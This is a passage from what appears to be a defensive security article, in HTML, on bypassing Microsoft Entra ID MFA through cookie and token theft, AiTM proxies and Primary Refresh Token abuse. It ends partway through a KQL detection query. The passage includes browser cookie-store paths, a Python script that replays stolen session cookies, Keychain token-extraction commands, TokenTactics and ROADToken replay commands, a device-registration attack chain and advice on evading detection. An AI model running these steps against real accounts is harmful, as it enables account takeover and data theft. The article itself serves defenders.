The most valuable are <strong>ESTSAUTH</strong> and <strong>ESTSAUTHPERSISTENT</strong>, the session cookies that represent a completed, MFA-satisfied authentication.</p>\n<div class=\"language-bash codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-bash codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Chrome/Edge store cookies in a SQLite database</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Windows path:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">%LOCALAPPDATA%</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\">Google</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\">Chrome</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\">User Data</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\">Default</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\">Network</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\">Cookies</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token 
plain\">%LOCALAPPDATA%</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\">Microsoft</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\">Edge</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\">User Data</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\">Default</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\">Network</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\">Cookies</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># macOS path:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">~/Library/Application Support/Google/Chrome/Default/Cookies</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">~/Library/Application Support/Microsoft Edge/Default/Cookies</span><br></span></code></pre></div></div>\n<p>The ESTSAUTH cookie, once extracted, can be replayed in a browser on any machine:</p>\n<div class=\"language-python codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-python codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span 
class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Using requests to replay the stolen session cookie</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> requests</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">session </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">Session</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">session</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">cookies</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">set</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ESTSAUTH'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 
66%, 32%)\">'&lt;stolen_cookie_value&gt;'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    domain</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'login.microsoftonline.com'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">session</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">cookies</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">set</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ESTSAUTHPERSISTENT'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'&lt;stolen_persistent_cookie&gt;'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    domain</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token string\" style=\"color:hsl(139, 66%, 
32%)\">'login.microsoftonline.com'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Access Microsoft 365 with the victim's authenticated session</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">r </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> session</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://outlook.office.com/mail/\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Returns the victim's inbox  no credential prompt, no MFA prompt</span><br></span></code></pre></div></div>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"macos-keychain-token-extraction-documented-in-2025\">macOS Keychain Token Extraction (Documented in 2025)<a 
href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#macos-keychain-token-extraction-documented-in-2025\" class=\"hash-link\" aria-label=\"Direct link to macOS Keychain Token Extraction (Documented in 2025)\" title=\"Direct link to macOS Keychain Token Extraction (Documented in 2025)\" translate=\"no\">​</a></h4>\n<p>Microsoft Edge on macOS caches OAuth tokens, including refresh tokens and in some cases Primary Refresh Tokens, in the macOS Keychain. This was documented by security researchers in late 2025:</p>\n<div class=\"language-bash codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-bash codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># List all Microsoft-related Keychain entries</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">security find-internet-password </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-l</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Microsoft Edge\"</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-g</span><span class=\"token plain\"> </span><span class=\"token operator file-descriptor important\" style=\"color:hsl(356, 75%, 47%);font-weight:bold\">2</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&gt;</span><span class=\"token file-descriptor important\" style=\"font-weight:bold;color:hsl(356, 75%, 
47%)\">&amp;1</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">grep</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-i</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"microsoft\\|azure\\|msal\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Specific entries to look for:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># \"refreshtoken-1--&lt;guid&gt;\"          OAuth refresh token</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># \"primaryrefreshtoken-1--&lt;guid&gt;\"   Primary Refresh Token (most valuable)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># \"accesstoken-1--&lt;guid&gt;\"           Short-lived access token</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span 
class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Export a specific entry:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">security find-generic-password </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-a</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"refreshtoken\"</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-s</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Microsoft Edge\"</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-w</span><br></span></code></pre></div></div>\n<p>With the extracted refresh token, the attacker replays it using TokenTactics or a custom script:</p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># TokenTactics  PowerShell module for token manipulation</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Import-Module TokenTactics</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 
16%)\"><span class=\"token plain\"># Refresh a stolen token for new access token</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$tokens = RefreshTo-MSGraphToken -refreshToken \"&lt;stolen_refresh_token&gt;\" `</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          -tenantId \"&lt;tenant_id&gt;\" `</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          -clientId \"d3590ed6-52b3-4102-aeff-aad2292ab01c\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$tokens.access_token   # New access token: immediate Graph API access</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$tokens.refresh_token  # New refresh token: sliding 90-day window</span><br></span></code></pre></div></div>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"aitm-adversary-in-the-middle-proxy--evilginx--tycoon-2fa\">AiTM (Adversary-in-the-Middle) Proxy  Evilginx / Tycoon 2FA<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#aitm-adversary-in-the-middle-proxy--evilginx--tycoon-2fa\" class=\"hash-link\" aria-label=\"Direct link to AiTM (Adversary-in-the-Middle) Proxy  Evilginx / Tycoon 2FA\" title=\"Direct link to AiTM (Adversary-in-the-Middle) Proxy  Evilginx / Tycoon 2FA\" translate=\"no\">​</a></h4>\n<p>The most scalable token theft mechanism is the AiTM reverse proxy, documented extensively in Tycoon 2FA campaigns (which comprised 65% of PhaaS-driven credential attacks in H1 2025 per Ontinue):</p>\n<!-- -->\n<p>The proxy sits transparently between user and Microsoft. 
The user completes real MFA. Microsoft issues real session cookies. The proxy captures them before forwarding to the user's browser. Both parties see a successful authentication. The attacker has the cookies.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"22-the-impossible-travel-detection-gap\">2.2 The Impossible Travel Detection Gap<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#22-the-impossible-travel-detection-gap\" class=\"hash-link\" aria-label=\"Direct link to 2.2 The Impossible Travel Detection Gap\" title=\"Direct link to 2.2 The Impossible Travel Detection Gap\" translate=\"no\">​</a></h3>\n<p>Once the attacker replays the token from their own IP, a geographic anomaly exists. However, token replay has a structural advantage over password-based attacks in evading impossible travel detection:</p>\n<ol>\n<li class=\"\">\n<p><strong>Non-interactive sign-ins don't always trigger impossible travel</strong>. When an attacker uses a refresh token to silently obtain new access tokens, these appear as <strong>non-interactive sign-ins</strong> in Entra ID logs, and by default in many tenant configurations they are not evaluated against the same risk policies as interactive sign-ins.</p>\n</li>\n<li class=\"\">\n<p><strong>The timing gap allows geographic plausibility</strong>. If the attacker waits several hours after token theft before using it from a distant location, the time delta makes the impossible travel calculation ambiguous.</p>\n</li>\n<li class=\"\">\n<p><strong>Commercial VPN and residential proxy services trivially bypass IP geolocation</strong>. 
Attackers use residential proxies in the victim's city or country to make the access appear local.</p>\n</li>\n</ol>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-3--primary-refresh-token-abuse-the-crown-jewel\">Part 3  Primary Refresh Token Abuse: The Crown Jewel<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#part-3--primary-refresh-token-abuse-the-crown-jewel\" class=\"hash-link\" aria-label=\"Direct link to Part 3  Primary Refresh Token Abuse: The Crown Jewel\" title=\"Direct link to Part 3  Primary Refresh Token Abuse: The Crown Jewel\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"31-what-a-prt-is-and-why-its-uniquely-dangerous\">3.1 What a PRT Is and Why It's Uniquely Dangerous<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#31-what-a-prt-is-and-why-its-uniquely-dangerous\" class=\"hash-link\" aria-label=\"Direct link to 3.1 What a PRT Is and Why It's Uniquely Dangerous\" title=\"Direct link to 3.1 What a PRT Is and Why It's Uniquely Dangerous\" translate=\"no\">​</a></h3>\n<p>The Primary Refresh Token is a special OAuth artifact issued by Entra ID to <strong>Azure AD joined or registered devices</strong>. 
It is the single most powerful token in the Microsoft identity stack:</p>\n<table><thead><tr><th>Token Type</th><th>Scope</th><th>Lifetime</th><th>MFA Claim</th><th>Device Bound</th></tr></thead><tbody><tr><td>Access Token</td><td>Specific resource</td><td>60–90 min</td><td>Claims inherited</td><td>No</td></tr><tr><td>Refresh Token</td><td>Tenant-wide</td><td>90 days</td><td>Claims inherited</td><td>No</td></tr><tr><td><strong>Primary Refresh Token</strong></td><td><strong>Any Entra ID resource</strong></td><td><strong>14 days (rolling)</strong></td><td><strong>Can satisfy MFA claim</strong></td><td><strong>Yes (TPM-protected on W11)</strong></td></tr></tbody></table>\n<p>A PRT includes a <code>device_id</code> claim and the MFA authentication method claim (<code>amr</code>). When a Conditional Access policy requires \"MFA required\" AND \"compliant device,\" the PRT can satisfy <strong>both conditions simultaneously</strong>. This is why PRT theft is the top-tier attack: stolen PRT → can bypass device compliance checks AND MFA requirements that a stolen access token or refresh token cannot bypass.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"32-prt-extraction-windows\">3.2 PRT Extraction (Windows)<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#32-prt-extraction-windows\" class=\"hash-link\" aria-label=\"Direct link to 3.2 PRT Extraction (Windows)\" title=\"Direct link to 3.2 PRT Extraction (Windows)\" translate=\"no\">​</a></h3>\n<p>On Windows 10 and 11 without TPM, the PRT is stored in LSASS memory and the Windows Credential Manager:</p>\n<div class=\"language-cmd codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-cmd codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 
12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Check if the current device has a PRT:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">dsregcmd /status</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Output indicates PRT presence:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># AzureAdPrt : YES</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># AzureAdPrtUpdateTime : 2025-01-15 09:23:44.000 UTC</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># AzureAdPrtExpiryTime : 2025-01-29 09:23:44.000 UTC</span><br></span></code></pre></div></div>\n<p>With SYSTEM-level access on the machine, an attacker can extract the PRT using tools that read from LSASS or the Windows Credential Manager:</p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># ROADToken  defensive research tool for PRT analysis</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Request a new access token using the extracted PRT</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 
16%)\"><span class=\"token plain\">.\\ROADToken.exe --prt &lt;extracted_prt&gt; --prt-sessionkey &lt;session_key&gt; `</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                --resource https://graph.microsoft.com/</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># The resulting access token satisfies device compliance claims</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># even when used from a different machine</span><br></span></code></pre></div></div>\n<p><strong>On Windows 11 with TPM:</strong> The PRT is bound to the TPM chip, making extraction dramatically harder: the private key used to prove PRT possession never leaves the TPM. However, Hyper-V Generation 1 VMs don't have TPM support, cloud-hosted VMs must be explicitly configured with vTPM, and UEFI/BIOS access can disable TPM.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"33-phishing-directly-for-a-prt--the-advanced-technique\">3.3 Phishing Directly for a PRT  The Advanced Technique<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#33-phishing-directly-for-a-prt--the-advanced-technique\" class=\"hash-link\" aria-label=\"Direct link to 3.3 Phishing Directly for a PRT  The Advanced Technique\" title=\"Direct link to 3.3 Phishing Directly for a PRT  The Advanced Technique\" translate=\"no\">​</a></h3>\n<p>Researcher Dirk-jan Mollema documented a technique where device code phishing, combined with device registration, can yield a full PRT:</p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div 
class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Attack chain to obtain PRT via device code phishing:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Step 1: Attacker initiates device code flow for the Windows broker app</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        client_id = 29d9ed98-a469-4536-ade2-f981bc1d605e  (Microsoft broker)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        scope = openid profile offline_access</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Step 2: Victim completes MFA (fresh MFA claim in the resulting token)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Step 3: Attacker has refresh token + fresh MFA claim</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Step 4: Attacker registers a new device to the tenant</span><br></span><span class=\"token-line\" 
style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        POST https://login.microsoftonline.com/common/oauth2/v2.0/token</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        {grant_type: refresh_token, scope: \"urn:ms-drs:enterpriseregistration...\"}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Step 5: With device registered, attacker requests PRT for that device</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        The PRT now carries: valid device_id + MFA claim from step 2</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Step 6: Attacker uses PRT to access ANY resource gated by:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        \"Require MFA\" ✓  (MFA claim from step 2)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        \"Require compliant device\" ✓  (registered device from step 4)</span><br></span></code></pre></div></div>\n<p><strong>KQL query to detect this device registration abuse:</strong></p>\n<div class=\"language-kql codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kql codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 
16%)\"><span class=\"token plain\">// Detect device registration immediately following device code authentication</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">let DeviceCodeLogins = SigninLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where TimeGenerated &gt; ago(24h)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where AuthenticationProtocol == \"deviceCode\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where ResultType == \"0\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | project UserPrincipalName, DeviceCodeTime = TimeGenerated,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">              IPAddress, CorrelationId;</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">let DeviceRegistrations = AuditLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where TimeGenerated &gt; ago(24h)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where OperationName == \"Register device\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">       or OperationName == \"Add registered users to device\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | extend UPN = 